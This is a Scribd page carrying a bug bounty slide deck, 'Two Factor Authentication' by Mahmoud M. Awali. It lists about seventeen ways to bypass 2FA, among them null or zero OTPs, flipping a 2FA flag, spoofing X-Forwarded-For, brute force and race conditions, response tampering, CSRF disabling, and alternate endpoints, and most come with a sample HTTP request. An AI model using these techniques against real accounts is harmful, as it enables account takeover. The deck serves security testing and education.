Scribd
Upload
569 views

Two Factor Authentication

The document outlines various methods an attacker could try to bypass two-factor authentication (2FA) on a website, including: 1. Sending an empty or fixed value for the one-time password (OTP) parameter. 2. Manipulating request parameters like changing the 2FA enabled flag to false. 3. Appending extra headers or modifying the request to bypass 2FA checks. 4. Attempting to exploit vulnerabilities in the 2FA implementation through techniques like bruteforcing, race conditions or leveraging other accounts.

Uploaded by

LinKanX
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
569 views

Two Factor Authentication

The document outlines various methods an attacker could try to bypass two-factor authentication (2FA) on a website, including: 1. Sending an empty or fixed value for the one-time password (OTP) parameter. 2. Manipulating request parameters like changing the 2FA enabled flag to false. 3. Appending extra headers or modifying the request to bypass 2FA checks. 4. Attempting to exploit vulnerabilities in the 2FA implementation through techniques like bruteforcing, race conditions or leveraging other accounts.

Uploaded by

LinKanX
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 20

2

Factor
Authentication
Enter 6-Digit Code

Mahmoud M. Awali
@0xAwali
My Methodology

attacker

Try To Send Empty OTP OR Set NULL e.g. otp=null To Bypass 2FA

● Writeup
POST /secondLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"email":"me","pass":"****","otp":""}
My Methodology

attacker

Try To Insert Zeros In OTP Parameter e.g. 000000 To Bypass 2FA

● Writeup
POST /secondLogin HTTP/1.1
Host: www.company.com
● Slides User-Agent: Mozilla/5.0
Content-Type: application/json
● Tweet Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"email":"me","pass":"****","otp":"000000"}
My Methodology

attacker

Always Notice Both Request When 2FA Is Enabled And Disabled e.g. There Is
Boolean Value True If 2FA Is Enabled Try To Change It To False To Bypass 2FA

● Tweet
POST /secondLogin HTTP/1.1
Host: www.company.com
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/json
● Writeup Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"email":"me","pass":"****","2fa":false,"otp":"****"}
My Methodology

attacker

Enable 2FA AND Try To Log In OR Remove OTP Parameter , Sometimes


Enabled 2FA Doesn't Work

● Writeup
POST /secondLogin HTTP/1.1
Host: www.company.com
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"email":"me","pass":"****"}
My Methodology

attacker

Try To Append X-Forwarded-For Header e.g. X-Forwarded-For: 127.0.0.1


To Bypass 2FA

● Writeup
POST /secondLogin HTTP/1.1
Host: www.company.com
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/json
● Writeup X-Forwarded-For: 127.0.0.1
Origin: https://www.company.com
Content-Length: Number

{"email":"me","pass":"****","otp":"*****"}
My Methodology

attacker

Try To Figure Out If The Old-OTP Is Valid OR OTP Is Fixed , If YES


There Is Issue Here

● Tweet
POST /secondLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"email":"me","pass":"****","otp":"Old-OTP"}
My Methodology

attacker

Try To Brute Force The OTP To Bypass 2FA

● Slides
POST /secondLogin HTTP/1.1
Host: www.company.com
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/json
● Writeup Referer: https://previous.com/path
Origin: https://www.company.com
● Writeup Content-Length: Number

{"email":"me","pass":"****","otp":"FUZZ"}
My Methodology

attacker

If There Is OTP Code Try To Brute Force By Using Race Condition Technique
OR IP Rotate Burp Suite Extension

● Writeup
POST /resetPassword HTTP/1.1
Host: www.company.com
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

email=me&pass=*****&otp=*****
My Methodology

attacker

Enter Wrong OTP Code Then Try To Manipulate The Response To Change The
Response To Response Of The Correct OTP Code To Bypass 2FA

● Slides HTTP/1.1 200 OK


Access-Control-Allow-Origin: https://www.company.com
● Slides Access-Control-Allow-Credentials: true
Content-Type: application/json; charset=utf-8
Content-Length: length
● Writeup
{
● Blog "code" : "correct otp"
"token" : "Random String"
}
My Methodology

attacker

Try To Login With OAuth , If There Is 2FA While Entering Email And
Password To Bypass 2FA

● Writeup
Steps to produce :-

1 - Log In With Valid Email and Password


2 - You Will Ask About OTP
3 - Try To Log In With OAuth
4 - You Will Access Your Account Without 2FA
My Methodology

attacker

Try To Use OTP Of Another Account e.g. Your Second Account To Bypass 2FA

● Writeup
POST /secondLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"email":"me","pass":"****","otp":"Your-OTP"}
My Methodology

attacker

Try To Disable 2FA With CSRF e.g. Disable 2FA In Account One , Use This
Request To Disable 2FA In Account Two By Using CSRF POC

● Slides
POST /setting HTTP/1.1
Host: www.company.com
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/json
● Writeup Referer: https://previous.com/path
Origin: https://www.company.com
● Tweet Content-Length: Number

{"action":"disable_2fa"}
My Methodology

attacker

If There Isn't Verifying Email Try To Sign up With Victim Email , And Log In
With his Email AND Password Then Enabled 2FA

● Writeup
POST /setting HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"action":"enable_2fa"}
My Methodology

attacker

Try To Figure Out Others Endpoints To Do The Same Action That Does Not
Require 2FA e.g. API Endpoints To Bypass 2FA

● Writeup
POST /apiLogin HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/json
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

{"email":"me","pass":"****"}
My Methodology

attacker

If There Is Endpoint To Generate Backup Codes Try To POST To It Directly e.g.


POST /generateBackup After Inserting Email And Password

● Blog
Steps to produce :-

1 - Logged In With Valid Email and Password


2 - Provided The Wrong OTP Code
3 - Captured The Request With Burp Suite
4 - Change Request To POST /generateBackup HTTP/1.1
5 - Change Body To {"action":"backup_codes"}
My Methodology

attacker

Try To Use SOAP Endpoint To Bypass 2FA e.g. There Is Endpoint Accept SOAP ,
Try To Send SOAP Body Without OTP Code With Valid Email AND Password

● Tweet POST /secondLogin HTTP/1.1


Host: www.company.com
Content-Type: application/xml
Content-Length: Number

<SOAP-ENV:Envelope>
<SOAP-ENV:Body>
<email>me</email>
<pass>*******</pass>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
My Methodology

attacker

Try To Sign Up , Try Use Your confirmation Link Of Email If Doesn't Expire
Multiple Times To Bypass 2FA

● Blog
Steps to produce :-

1 - Sign Up With Email


2 - Click On Confirmation Link
3 - Enable 2FA
4 - After 24 Hours , Click Again On Confirmation Link
5 - Is There 2FA OR Not
Hack3rScr0lls ● Tweet #BugBounty #BugBountyTip
Thank
You
Mahmoud M. Awali
@0xAwali

You might also like